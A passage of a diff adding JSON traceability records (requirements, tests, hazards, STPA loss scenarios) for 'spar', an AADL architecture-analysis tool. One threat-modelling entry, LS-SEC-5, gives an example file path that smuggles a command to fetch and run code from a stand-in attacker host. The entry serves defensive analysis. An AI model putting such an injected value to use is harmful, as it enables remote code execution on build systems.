+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH5",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH8",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH9",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH10",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH11",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH13",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH14",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-020",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-024",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-025",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-026",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-027",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-028",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-029",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-030",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-031",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "spar-analysis",
+      "type": "design-decision"
+    },
+    {
+      "description": "Verifies that a string expression against an integer type produces a type mismatch diagnostic.\n",
+      "id": "VAL-005",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "String mismatches integer type",
+      "type": "feature"
+    },
+    {
+      "description": "A self-contained HTML file with embedded JavaScript provides pan, zoom, minimap, search, and selection/highlighting. No external dependencies — the entire interactive viewer is a single file.\n",
+      "id": "ARCH-R3",
+      "links": [
+        {
+          "target": "RENDER-REQ-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "RENDER-REQ-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "Interactive HTML wrapper",
+      "type": "design-decision"
+    },
+    {
+      "description": "Tests for ItemTree lowering, instance model construction, name resolution, and standard property definitions.\n",
+      "id": "TEST-HIR-DEF",
+      "links": [
+        {
+          "target": "ARCH-HIR-DEF",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-INST-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PROP-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PROP-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-RESOLVE-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-RESOLVE-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "HIR definition unit tests",
+      "type": "feature"
+    },
+    {
+      "description": "Tests for all 19+ analysis passes including connectivity, scheduling, latency, resource budget, EMV2, ARINC 653, legality, and classifier matching.\n",
+      "id": "TEST-ANALYSIS",
+      "links": [
+        {
+          "target": "ARCH-ANALYSIS",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-008",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SOLVER-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SOLVER-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SOLVER-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SOLVER-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Analysis pass unit tests",
+      "type": "feature"
+    },
+    {
+      "description": "Tests validating each codegen output layer independently: WIT interface generation, Rust crate skeleton generation, Cargo.toml and BUILD.bazel config generation, test harness generation, and Lean4/Kani proof skeleton generation. Verifies structural correctness of generated artifacts.\n",
+      "id": "VAL-CODEGEN-002",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-WIT",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-CODEGEN-RUST",
+          "type": "verifies"
+        },
+        {
+          "target": "ARCH-CODEGEN-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-CODEGEN-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-CODEGEN-004",
+          "type": "satisfies"
+        }
+      ],
+      "status": "pass",
+      "tags": [],
+      "title": "WIT/Rust/Config/Test/Proof generation output validation",
+      "type": "feature"
+    },
+    {
+      "description": "Verifies that when utilization is within the RMA bound, no RMA/EDF cross-check diagnostic is emitted (not needed).\n",
+      "id": "VAL-040",
+      "links": [
+        {
+          "target": "STPA-REQ-024",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "No cross-check when RMA schedulable",
+      "type": "feature"
+    },
+    {
+      "description": "Extract a petgraph from the AADL instance model representing the hardware topology: processors as nodes, buses as edges, with capacity properties (CPU budget, memory size, bus bandwidth). Serves as the target graph for deployment optimization.\n",
+      "id": "REQ-SOLVER-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "solver",
+        "topology",
+        "v030"
+      ],
+      "title": "Hardware topology graph extraction",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that fully qualified references (Pkg::Type) do not produce ambiguity warnings.\n",
+      "id": "VAL-017",
+      "links": [
+        {
+          "target": "STPA-REQ-007",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-006",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Qualified reference no ambiguity warning",
+      "type": "feature"
+    },
+    {
+      "description": "A query language using path expressions (e.g., components.where( category == thread).property(Period)) to select and filter instance model elements. Supports predicate filtering, property extraction, and aggregation.\n",
+      "id": "REQ-QUERY-001",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "query",
+        "instance",
+        "v040"
+      ],
+      "title": "Path-expression query language over instance model",
+      "type": "requirement"
+    },
+    {
+      "description": "Trace connections through the hierarchy resolving across, up, and down patterns to produce end-to-end connection instances.\n",
+      "id": "REQ-INST-003",
+      "links": [],
+      "status": "partial",
+      "tags": [
+        "instance",
+        "as5506-ch14"
+      ],
+      "title": "Semantic connection tracing",
+      "type": "requirement"
+    },
+    {
+      "description": "Validate partition window scheduling, inter-partition communication, and process-to-partition bindings per ARINC 653.\n",
+      "id": "REQ-ANALYSIS-006",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis",
+        "arinc653"
+      ],
+      "title": "ARINC 653 partition scheduling",
+      "type": "requirement"
+    },
+    {
+      "description": "Import OMG ReqIF XML into rivet artifacts. Bridges enterprise ALM tools (DOORS, Jama, Polarion) with spar's architecture verification. Requirements flow into rivet, trace to AADL components via spar verify.\n",
+      "id": "REQ-INTEROP-002",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "interop",
+        "requirements",
+        "v040"
+      ],
+      "title": "ReqIF import for requirements interchange",
+      "type": "requirement"
+    },
+    {
+      "description": "The latency analysis must detect when an end-to-end flow crosses processor boundaries and no inter-processor communication overhead property (Transmission_Time or SPAR_Properties::Inter_Processor_Overhead) is specified. In such cases, the analysis must emit an info diagnostic warning that the latency estimate may understate actual delay.\n",
+      "id": "STPA-REQ-028",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "latency",
+        "multi-processor",
+        "stpa"
+      ],
+      "title": "Multi-processor communication overhead awareness",
+      "type": "requirement"
+    },
+    {
+      "description": "Bidirectional transform between WebAssembly Interface Types and AADL component declarations.\n",
+      "id": "REQ-TRANSFORM-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "transform",
+        "wit"
+      ],
+      "title": "WIT to AADL transform",
+      "type": "requirement"
+    },
+    {
+      "description": "Support component type extension, implementation extension, feature refinement, and subcomponent refinement.\n",
+      "id": "REQ-MODEL-005",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "model",
+        "as5506-ch4"
+      ],
+      "title": "Component extension (extends, refined to)",
+      "type": "requirement"
+    },
+    {
+      "description": "When processor utilization exceeds 80%, the scheduling analysis must emit an advisory noting that clock drift between processors may cause period jitter that increases effective utilization. Engineers should consider adding a timing margin via SPAR_Properties::Clock_Drift_Margin.\n",
+      "id": "STPA-REQ-029",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "scheduling",
+        "timing",
+        "stpa"
+      ],
+      "title": "Clock drift margin advisory",
+      "type": "requirement"
+    },
+    {
+      "description": "When lowering SysML v2 part usages and ref usages to AADL subcomponents, the subcomponent category must be inferred from the referenced type definition's category, not hardcoded to ComponentCategory::System. When the referenced type is not available, a warning diagnostic must be emitted.\n",
+      "id": "STPA-REQ-034",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "sysml2",
+        "category",
+        "stpa"
+      ],
+      "title": "SysML v2 subcomponent category propagation",
+      "type": "requirement"
+    },
+    {
+      "description": "Recursively expand a root system implementation into a flattened component hierarchy with features, connections, and modes.\n",
+      "id": "REQ-INST-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "instance",
+        "as5506-ch14"
+      ],
+      "title": "Recursive system instantiation",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that scheduling analysis does not emit the SOM awareness diagnostic when the instance has no system operation modes.\n",
+      "id": "VAL-028",
+      "links": [
+        {
+          "target": "STPA-REQ-017",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-013",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "No SOM diagnostic without modes",
+      "type": "feature"
+    },
+    {
+      "description": "An integration test must serialize every spar-hir public type to JSON, deserialize it back, and verify structural equality. This test must run on a non-trivial AADL model with instances, arrays, modes, properties, and connections.\n",
+      "id": "STPA-REQ-019",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "output",
+        "serde",
+        "stpa"
+      ],
+      "title": "Serialization round-trip test",
+      "type": "requirement"
+    },
+    {
+      "description": "Query expressions use a method-chain syntax over the instance model: components.where(predicate).property(name) selects components matching a predicate and extracts property values. Supports category filters, property existence checks, value comparisons, and aggregation (count, sum, min, max).\n",
+      "id": "ARCH-QUERY-001",
+      "links": [
+        {
+          "target": "REQ-QUERY-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "architecture",
+        "query",
+        "v040"
+      ],
+      "title": "Path-expression query language: components.where().property() pattern",
+      "type": "design-decision"
+    },
+    {
+      "description": "Verifies that an end-to-end flow crossing processor boundaries without a Transmission_Time or Inter_Processor_Overhead property emits an info diagnostic about underestimated latency.\n",
+      "id": "VAL-048",
+      "links": [
+        {
+          "target": "STPA-REQ-028",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Cross-processor flow without overhead emits info",
+      "type": "feature"
+    },
+    {
+      "description": "\nLayer 0 optimizes for minimum CPU utilization on each processor.\n\nLayer 1 optimizes for minimum number of processors used. These\n\nlocal optima pack threads tightly onto few processors. Layer 2\n\nselects the cheapest (lowest-bandwidth) protocol for each\n\nconnection. All layers satisfy their local constraints. But at\n\nLayer 3,\nthe end-to-end latency of a safety-critical flow exceeds\n\nits 50ms deadline because:\n(a) threads are on heavily-loaded\n\nprocessors with high scheduling delay,\n(b) the flow crosses 3\n\nbus hops each with 10ms protocol overhead,\nand (c) the total\n\npath latency is 65ms. No individual layer saw this violation\n\nbecause none had the global view.\n",
+      "id": "LS-S9",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Local optima violate global E2E latency",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "CC-6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Array dimensions must be validated positive",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nThe solver's RTA computation uses floating-point arithmetic\n\nthat accumulates rounding errors,\ncausing a utilization of\n\n1.0000000000001 to be reported as <= 1.0,\nor vice versa.\n\nBoundary cases are decided by numerical noise rather than\n\nactual schedulability.\n",
+      "id": "H-S12",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Floating-point precision causes incorrect schedulability",
+      "type": "hazard"
+    },
+    {
+      "description": "Eight tests verifying SVG graph output contains correct number of nodes and edges matching the instance model, with proper labels and connection endpoints.\n",
+      "id": "TEST-STPA-SVG-TOPOLOGY",
+      "links": [
+        {
+          "target": "STPA-REQ-021",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "SVG topology verification tests (STPA-REQ-021)",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-SEC-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generated dependencies must use exact version pins with checksums",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Instance builder must detect circular containment",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The scheduling analysis must perform a sensitivity check by perturbing execution times by +10% and checking if the schedulability conclusion changes. If nominal utilization passes the schedulability bound but perturbed utilization exceeds it, the analysis must emit a warning indicating thin timing margins.\n",
+      "id": "STPA-REQ-025",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "scheduling",
+        "stpa"
+      ],
+      "title": "Sensitivity analysis — timing margin perturbation",
+      "type": "requirement"
+    },
+    {
+      "description": "Array dimension expressions must evaluate to positive integers (>= 1). Zero or negative dimensions must produce an error diagnostic. Non-integer dimensions must produce an error.\n",
+      "id": "STPA-REQ-009",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "instance",
+        "arrays",
+        "stpa"
+      ],
+      "title": "Array dimension validation",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-S8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Protocol selected without matching security level",
+      "type": "uca"
+    },
+    {
+      "description": "Generated workspace includes BUILD.bazel for hermetic builds: rules_wasm_component (WIT → bindgen → compile → .wasm), rules_verus (SMT checking), rules_lean (proof checking), rules_kani (bounded model checking). Cargo.toml also generated for development iteration.\n",
+      "id": "REQ-CODEGEN-BAZEL",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "codegen",
+        "bazel",
+        "v040"
+      ],
+      "title": "Generate Bazel BUILD files for WASM + verification",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-17",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 constraint values must produce typed PropertyExpr",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Parse all AADL v2.2 lexical elements (identifiers, numeric literals, string literals, comments, 76 reserved words) and produce a lossless concrete syntax tree (CST) preserving every byte of input.\n",
+      "id": "REQ-PARSE-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "parsing",
+        "as5506-ch15"
+      ],
+      "title": "AADL v2.2 lexical and syntactic parsing",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-12",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Analyses must account for modes and property overrides",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Validate that ASIL decomposition rules are satisfied in the deployment: decomposed requirements are allocated to sufficiently independent elements, freedom from interference is ensured (spatial via MMU, temporal via scheduling, communication via controlled interfaces). Supports ISO 26262 ASIL, DO-178C DAL, and IEC 61508 SIL.\n",
+      "id": "REQ-SOLVER-008",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "solver",
+        "safety",
+        "v040"
+      ],
+      "title": "Safety decomposition validation (ASIL/DAL/SIL)",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-S10",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "E2E latency check uses incomplete path",
+      "type": "uca"
+    },
+    {
+      "description": "Added LoweringDiagnostic and LoweringSeverity types to the ItemTree module. ItemTree gains a diagnostics: Vec<LoweringDiagnostic> field populated during CST→ItemTree lowering. This allows the lowering pass to report issues without aborting — diagnostics are collected and surfaced through the normal diagnostic pipeline.\n",
+      "id": "ARCH-001",
+      "links": [
+        {
+          "target": "STPA-REQ-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-004",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "LoweringDiagnostic infrastructure in ItemTree",
+      "type": "design-decision"
+    },
+    {
+      "description": "Analyses that read property values (scheduling, latency, resource budget) must evaluate properties per system operation mode when modal property associations exist. The analysis must report the worst-case mode or report per-mode results.\n",
+      "id": "STPA-REQ-017",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "analysis",
+        "modes",
+        "stpa"
+      ],
+      "title": "Modal-aware analysis",
+      "type": "requirement"
+    },
+    {
+      "description": "When CST lowering cannot determine property value type, a text-based fallback parser handles booleans, references, classifiers, ranges, lists, numerics with units, and enums. Covers legacy and mixed-version AADL property syntax gracefully.\n",
+      "id": "ARCH-PROP-LOWERING",
+      "links": [
+        {
+          "target": "REQ-PROP-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "v0.5.0",
+        "properties"
+      ],
+      "title": "Property CST lowering with text fallback parser",
+      "type": "design-decision"
+    },
+    {
+      "description": "When components are annotated with redundancy properties (e.g., replicated channels, hot standby pairs), the solver must enforce physical separation — redundant components must be allocated to different processors, different buses, and (when specified) different cabinets. The solver must detect redundancy annotations and apply anti-affinity automatically.\n",
+      "id": "SOLVER-REQ-008",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "allocation",
+        "redundancy",
+        "stpa"
+      ],
+      "title": "Redundancy-aware allocation",
+      "type": "requirement"
+    },
+    {
+      "description": "\nThe rewriter inserts a new property association into a component's\n\nproperties block. The insertion logic does not account for the\n\nexisting indentation level. The new property is inserted at column 0\n\nwith no trailing semicolon. The AADL file now has a syntax error.\n\nThe engineer runs spar parse and sees an error in a file they\n\ndid not manually modify,\ncreating confusion. If they don't re-parse\n\nbefore committing,\nthe broken file enters version control.\n",
+      "id": "LS-S6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Rewriter corrupts property block formatting",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nProperty values must be evaluated with correct units,\narithmetic,\n\ndefaults,\nand inheritance chains. Unit conversion factors must match\n\nthe AS5506 standard.\n",
+      "id": "SC-6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Property evaluation correctness",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Compile spar to wasm32-wasip2. Export adapter and renderer interfaces via WIT.\n",
+      "id": "REQ-WASM-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "integration",
+        "wasm"
+      ],
+      "title": "WASM component target",
+      "type": "requirement"
+    },
+    {
+      "description": "The scheduling analysis must cross-check results between Rate Monotonic Analysis (RMA) and Earliest Deadline First (EDF) schedulability tests. When a task set is not guaranteed schedulable under RMA but would be schedulable under EDF (utilization <= 100%), the analysis must report this discrepancy so engineers can consider alternative scheduling policies or perform response-time analysis.\n",
+      "id": "STPA-REQ-024",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "scheduling",
+        "stpa"
+      ],
+      "title": "Independent verification — RMA/EDF cross-check",
+      "type": "requirement"
+    },
+    {
+      "description": "Model Context Protocol server running as a spar CLI subcommand, exposing AADL analysis passes as MCP tools and instance model elements as MCP resources over stdio JSON-RPC transport.\n",
+      "id": "REQ-MCP-001",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "mcp",
+        "integration",
+        "v040"
+      ],
+      "title": "MCP server exposing analysis tools and model resources",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-S9",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Bus binding not performed for cross-processor connection",
+      "type": "uca"
+    },
+    {
+      "description": "After all source rewrites are applied, the solver must re-parse every modified AADL file and verify zero new syntax errors. If any modified file has parse errors, all rewrites must be rolled back (original files restored) and an error diagnostic must identify which file has the syntax error and the approximate insertion location.\n",
+      "id": "SOLVER-REQ-019",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "rewriter",
+        "validation",
+        "stpa"
+      ],
+      "title": "Mandatory parse-after-rewrite validation",
+      "type": "requirement"
+    },
+    {
+      "description": "AADL package library defining virtual bus types for common protocols: DDS, SOME/IP, shared memory, CAN, CAN FD, Ethernet, AFDX, SpaceWire, PROFINET, EtherCAT, MAVLink. Each includes latency overhead, bandwidth, max payload, security profile, and bus type compatibility properties.\n",
+      "id": "REQ-SOLVER-002",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "solver",
+        "protocol",
+        "v030"
+      ],
+      "title": "Virtual bus library (communication protocol catalog)",
+      "type": "requirement"
+    },
+    {
+      "description": "Two solver tiers. Tier 1 (WASM): pure Rust heuristics (FFD/BFD bin-packing, NSGA-II for Pareto). Runs in browser and CLI. Tier 2 (native): exact solver via good_lp+HiGHS (MILP) or cp_sat (CP-SAT). Returns optimality certificates. CLI only due to C++ dependencies.\n",
+      "id": "ARCH-SOLVER-006",
+      "links": [
+        {
+          "target": "REQ-SOLVER-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SOLVER-006",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "architecture",
+        "solver",
+        "v040"
+      ],
+      "title": "Dual solver strategy (WASM heuristic + native exact)",
+      "type": "design-decision"
+    },
+    {
+      "description": "Unit and integration tests for the WASM component including render and analyze functions.\n",
+      "id": "TEST-WASM",
+      "links": [
+        {
+          "target": "ARCH-WASM",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "WASM component tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe verus_verify rule constructs a shell command:\n\n`{verus_cmd}\n2>&1 | tee {log}` where verus_cmd is built by\n\njoining `[verus]\n+ extra_args + src_paths`. If a source file\n\npath contains shell metacharacters (possible in Bazel labels\n\nor when paths are constructed from model names),\nthe shell\n\ninterprets them. For example,\na file path containing\n\n`$(curl attacker.com/exploit | sh)` would execute during\n\nverification. While Bazel typically controls file paths,\nthe\n\nrules_verus defs.bzl uses run_shell which is inherently unsafe\n\nfor path handling.\n",
+      "id": "LS-SEC-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Attack path: shell injection via Verus verification rule",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Connection patterns referencing array indices (e.g., sub[i] -> sub[i+1]) must be validated against the declared array dimension. Out-of-bounds indices must produce an error diagnostic.\n",
+      "id": "STPA-REQ-010",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "instance",
+        "arrays",
+        "stpa"
+      ],
+      "title": "Array connection index bounds checking",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that range min/max expressions are checked against the inner type, and mismatched bounds produce diagnostics.\n",
+      "id": "VAL-011",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Range inner type checking",
+      "type": "feature"
+    },
+    {
+      "description": "19 golden model integration tests validating end-to-end code generation from AADL instance model. Each test generates output into a temporary directory and compares against checked-in golden files. Covers WIT generation, Rust skeleton generation, Cargo workspace layout, and rivet frontmatter in design documents.\n",
+      "id": "VAL-CODEGEN-001",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-001",
+          "type": "verifies"
+        },
+        {
+          "target": "ARCH-CODEGEN-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-SEC-REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "pass",
+      "tags": [],
+      "title": "Golden model integration tests for codegen",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CA-INSTANTIATE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Instantiate system",
+      "type": "control-action"
+    },
+    {
+      "description": "Text-based fallback parser handles booleans, references, classifiers, ranges, lists, numerics with units, and enums when CST lowering fails.\n",
+      "id": "FEAT-PROP-LOWERING",
+      "links": [
+        {
+          "target": "REQ-PROP-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [
+        "v0.5.0",
+        "properties"
+      ],
+      "title": "Property CST lowering with text fallback",
+      "type": "feature"
+    },
+    {
+      "description": "Verifies that setting Context_Switch_Time suppresses the interrupt overhead advisory.\n",
+      "id": "VAL-054",
+      "links": [
+        {
+          "target": "STPA-REQ-030",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "No interrupt overhead advisory with Context_Switch_Time",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "UCA-17",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 lowering silently drops construct",
+      "type": "uca"
+    },
+    {
+      "description": "\nGenerated Lean4 proofs only verify scheduling properties (RTA).\n\nGenerated Kani harnesses only verify single-thread deadline bounds\n\nin isolation (no interference). Neither covers data integrity,\n\nmemory safety of generated port structs,\nor correct dispatch\n\nprotocol behavior. An attacker can satisfy all verification\n\nconditions while the runtime code has exploitable defects.\n",
+      "id": "H-SEC-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verification artifacts do not cover runtime behavior",
+      "type": "hazard"
+    },
+    {
+      "description": "\nThe solver's schedulability analysis must be pessimistic — it must\n\nnever accept a task set that could miss deadlines. Approximations\n\nmust err on the side of rejection,\nnot acceptance.\n",
+      "id": "SC-S2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Timing analysis must be conservative",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nOptimality certificates must contain sufficient information for\n\nan independent verifier to check the claim. The verifier must\n\nbe a separate code path from the solver.\n",
+      "id": "SC-S6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Optimality certificates must be independently verifiable",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "CTRL-ANALYSIS",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Analysis Engine (spar-analysis)",
+      "type": "controller"
+    },
+    {
+      "description": "WASM component exporting adapter and renderer interfaces via WIT. Compiles to wasm32-wasip2. 1.3MB release binary.\n",
+      "id": "ARCH-WASM",
+      "links": [
+        {
+          "target": "REQ-WASM-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "spar-wasm",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "UCA-SEC-8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Kani harness verifies only base case without interference",
+      "type": "uca"
+    },
+    {
+      "description": "End-to-end latency computation must include all path segments: thread worst-case execution time, scheduling delay (response time minus execution time), bus transmission delay (from protocol worst-case latency), protocol overhead (framing, encryption), context-switch time, and queuing delay. Each segment must be individually reported in the latency breakdown. Missing segments must produce a diagnostic.\n",
+      "id": "SOLVER-REQ-013",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "e2e-latency",
+        "stpa"
+      ],
+      "title": "Complete E2E latency path computation",
+      "type": "requirement"
+    },
+    {
+      "description": "\nAfter source rewriting,\nthe solver must either invalidate all\n\naffected salsa queries or force a full re-computation before\n\npost-rewrite analysis.\n",
+      "id": "SC-S8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Cache must be invalidated after source rewrite",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-S9",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Safety co-location requires verified containment",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nLayout must be deterministic — the same AADL model must always\n\nproduce the same rendered layout. No randomized placement or\n\nnon-deterministic ordering.\n",
+      "id": "RENDER-REQ-004",
+      "links": [],
+      "status": "implemented",
+      "tags": [],
+      "title": "Deterministic layout",
+      "type": "safety-requirement"
+    },
+    {
+      "description": "Report parse errors with file path, line, and column. Recover from errors to continue parsing the rest of the file.\n",
+      "id": "REQ-PARSE-002",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "parsing",
+        "diagnostics"
+      ],
+      "title": "Parse error recovery with source locations",
+      "type": "requirement"
+    },
+    {
+      "description": "Rowan-based SysML v2 parser handles full KerML grammar including part, port, connection, requirement, constraint, action, and state definitions with lossless CST and error recovery.\n",
+      "id": "FEAT-SYSML2-PARSE",
+      "links": [
+        {
+          "target": "REQ-SYSML2-PARSE",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [
+        "v0.5.0",
+        "sysml2"
+      ],
+      "title": "SysML v2 KerML parser completion",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "UCA-19",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 property semantics lost in lowering",
+      "type": "uca"
+    },
+    {
